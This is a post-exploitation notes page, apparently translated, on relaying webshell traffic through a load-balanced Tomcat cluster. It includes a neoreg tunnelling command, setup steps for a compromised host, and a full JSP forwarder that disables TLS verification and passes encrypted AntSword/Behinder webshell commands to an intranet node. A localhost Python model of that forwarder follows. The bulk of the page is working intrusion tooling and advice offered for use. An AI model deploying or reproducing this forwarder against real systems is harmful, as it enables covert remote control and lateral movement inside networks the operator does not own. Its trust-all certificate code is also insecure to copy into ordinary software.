Proxying
If a proxy can be set up, neoreg works; it also supports forwarding to an intranet host (-r).
Kali pitfall: with an HTTPS target, hang Burp in front (--proxy):

```sh
python3 neoreg.py -k password -u https://xxx/111tun.jspx -r https://xxx/111tun.jspx --proxy http://127.0.0.1:8080
```
When a proxy cannot be set up ->
Prerequisites
After getting a shell, the target sits behind a load balancer, so Cobalt Strike (CS) cannot be brought up directly.
- After getting the shell, read server.xml to find the port Tomcat listens on locally (the Connector port; SSLEnabled="true" means it is https).
- The load-balanced machines can reach each other on the intranet: curl -k -i http://192.168.11.2:22222
- Make sure antproxy.jsp exists on every node: request it through the load balancer repeatedly; a single 404 means one node is missing the file.
Implementation
Ignoring the SSL certificate, see http://alifrp.yllcc.com:8443/article/9
```jsp
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page trimDirectiveWhitespaces="true" %>
<%@ page import="javax.net.ssl.*" %>
<%@ page import="java.io.*" %>
<%@ page import="java.net.HttpURLConnection" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.security.cert.X509Certificate" %>
<%!
    // Accept any certificate and any hostname: the intranet node runs a
    // self-signed cert, and this JSP is only a forwarder for the webshell client.
    public static void ignoreSsl() throws Exception {
        HostnameVerifier hv = new HostnameVerifier() {
            public boolean verify(String urlHostName, SSLSession session) { return true; }
        };
        trustAllHttpsCertificates();
        HttpsURLConnection.setDefaultHostnameVerifier(hv);
    }

    private static void trustAllHttpsCertificates() throws Exception {
        TrustManager[] trustAllCerts = new TrustManager[] { new X509TrustManager() {
            // Return an empty array rather than null: some JDK code paths iterate over it.
            public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }
            public void checkClientTrusted(X509Certificate[] certs, String authType) { }
            public void checkServerTrusted(X509Certificate[] certs, String authType) { }
        } };
        SSLContext sc = SSLContext.getInstance("TLS");
        sc.init(null, trustAllCerts, new java.security.SecureRandom());
        HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
    }
%>
<%
    // Target: the real webshell on the intranet node, on the port found in server.xml
    String target = "https://192.168.11.2:22222/ant.jsp";
    URL url = new URL(target);
    if ("https".equalsIgnoreCase(url.getProtocol())) {
        ignoreSsl();
    }
    HttpURLConnection conn = (HttpURLConnection) url.openConnection(); // use openConnection(proxy) if a proxy is needed
    String method = request.getMethod();
    conn.setRequestMethod(method);
    conn.setConnectTimeout(30000);
    conn.setReadTimeout(30000);
    conn.setDoInput(true);
    conn.setInstanceFollowRedirects(false); // never follow redirects: the client expects the shell's raw reply
    // Pass the client's Content-Type through; the webshell server side keys off it
    String ct = request.getContentType();
    if (ct != null) conn.setRequestProperty("Content-Type", ct);

    byte[] buf = new byte[1024];
    int len;
    // Relay the request body (the encrypted webshell command) to the intranet node.
    // Only open an output stream for requests that carry a body: getOutputStream()
    // on a GET silently turns it into a POST.
    if (!"GET".equals(method)) {
        conn.setDoOutput(true);
        conn.connect();
        OutputStream antout = conn.getOutputStream();
        InputStream in = request.getInputStream();
        while ((len = in.read(buf)) != -1) {
            antout.write(buf, 0, len);
        }
        antout.flush();
        antout.close();
    } else {
        conn.connect();
    }

    // Relay the node's reply back to the client as raw bytes (Behinder returns encrypted binary).
    // getInputStream() throws on 4xx/5xx, so fall back to getErrorStream() to pass the real body through.
    InputStream inputStream;
    try {
        inputStream = conn.getInputStream();
    } catch (IOException e) {
        inputStream = conn.getErrorStream();
    }
    response.setStatus(conn.getResponseCode());
    String rct = conn.getContentType();
    if (rct != null) response.setContentType(rct);
    OutputStream forwardout = response.getOutputStream();
    if (inputStream != null) {
        while ((len = inputStream.read(buf)) != -1) {
            forwardout.write(buf, 0, len);
        }
        inputStream.close();
    }
    forwardout.flush();
    forwardout.close();
%>
```
Pitfall: in the real environment `<%@ page trimDirectiveWhitespaces="true" %>` must be set. Without it, the newline after each page directive is emitted through the JSP's own writer ahead of the raw bytes relayed on the output stream, and the webshell client cannot decrypt the reply.
Drawback: the file upload feature cannot be used. The client uploads the file in chunks, and the load balancer spreads those chunks across different nodes, so no single node ever holds the whole file.
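To exercise the forwarding logic and the whitespace pitfall without a target, here is an added example, not code from the original post: a Python model of antproxy.jsp that runs entirely on localhost. The backend handler stands in for the intranet node running ant.jsp (its reply format, the 0x00 prefix plus a SHA-256 of the body, and the HTTP 500 on an empty payload are assumptions made for this example); the forwarder relays method, Content-Type, body and status the way the JSP above does, falls through to the error body on 4xx/5xx instead of failing like getInputStream() would, and with leading_newline=True reproduces what a JSP without trimDirectiveWhitespaces does to the reply.

```python
# Added example (not from the original post): localhost model of antproxy.jsp.
import hashlib
import ssl
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def _status(resp):
    """HTTP status for both HTTPResponse and HTTPError objects."""
    return getattr(resp, "status", None) or resp.code


class BackendNode(BaseHTTPRequestHandler):
    """Stand-in for the intranet node running ant.jsp (assumed reply format)."""

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if not body:
            reply, status = b"no payload", 500   # a broken shell: 5xx with a diagnostic body
        else:
            reply, status = b"\x00" + hashlib.sha256(body).digest(), 200
        self.send_response(status)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)

    def log_message(self, *args):  # keep the example quiet
        pass


def make_forwarder(target, leading_newline=False):
    """Handler that relays the request body to `target` and streams the reply
    back. leading_newline=True models a JSP without trimDirectiveWhitespaces:
    the directive newlines go out before the forwarded bytes."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE          # same effect as ignoreSsl() in the JSP
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({}),     # ignore HTTP(S)_PROXY from the environment
        urllib.request.HTTPSHandler(context=ctx),
    )

    class Forwarder(BaseHTTPRequestHandler):
        def do_POST(self):
            body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
            req = urllib.request.Request(
                target, data=body, method=self.command,
                headers={"Content-Type": self.headers.get(
                    "Content-Type", "application/octet-stream")})
            try:
                resp = opener.open(req, timeout=30)
            except urllib.error.HTTPError as err:
                # Java's getInputStream() throws here and the JSP would answer
                # with Tomcat's error page; HTTPError is itself a response, relay it.
                resp = err
            out = (b"\n" if leading_newline else b"") + resp.read()
            self.send_response(_status(resp))
            self.send_header("Content-Type", "application/octet-stream")
            self.send_header("Content-Length", str(len(out)))
            self.end_headers()
            self.wfile.write(out)

        def log_message(self, *args):
            pass

    return Forwarder


def serve(handler):
    srv = HTTPServer(("127.0.0.1", 0), handler)   # port 0: pick a free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def round_trip(payload, leading_newline=False):
    """Send `payload` client -> forwarder -> backend; return (status, reply bytes)."""
    backend = serve(BackendNode)
    target = "http://127.0.0.1:%d/ant.jsp" % backend.server_address[1]
    proxy = serve(make_forwarder(target, leading_newline))
    try:
        req = urllib.request.Request(
            "http://127.0.0.1:%d/antproxy.jsp" % proxy.server_address[1],
            data=payload, method="POST",
            headers={"Content-Type": "application/octet-stream"})
        opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
        try:
            resp = opener.open(req, timeout=10)
        except urllib.error.HTTPError as err:
            resp = err
        return _status(resp), resp.read()
    finally:
        for srv in (proxy, backend):
            srv.shutdown()
            srv.server_close()


def expected_reply(payload):
    """What a correctly relayed reply for `payload` must look like."""
    return b"\x00" + hashlib.sha256(payload).digest()


if __name__ == "__main__":
    blob = bytes(range(256))                              # constructed binary payload
    print(round_trip(blob) == (200, expected_reply(blob)))  # True
    print(round_trip(blob, leading_newline=True)[1][:1])    # b'\n': the client would fail to decrypt
    print(round_trip(b""))                                  # (500, b'no payload')
```

The 500 case is the one worth noting: because the forwarder reads the error body instead of propagating the exception, the operator sees the node's actual diagnostic rather than the front server's generic error page, which makes it much easier to tell a dead ant.jsp from a broken forwarder.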
References: https://mp.weixin.qq.com/s/4Bmz_fuu0yrLMK1oBKKtRA
https://www.matools.com/file/manual/jdk_api_1.8_google/java/net/HttpURLConnection.html
https://www.matools.com/file/manual/jdk_api_1.8_google/java/net/URL.html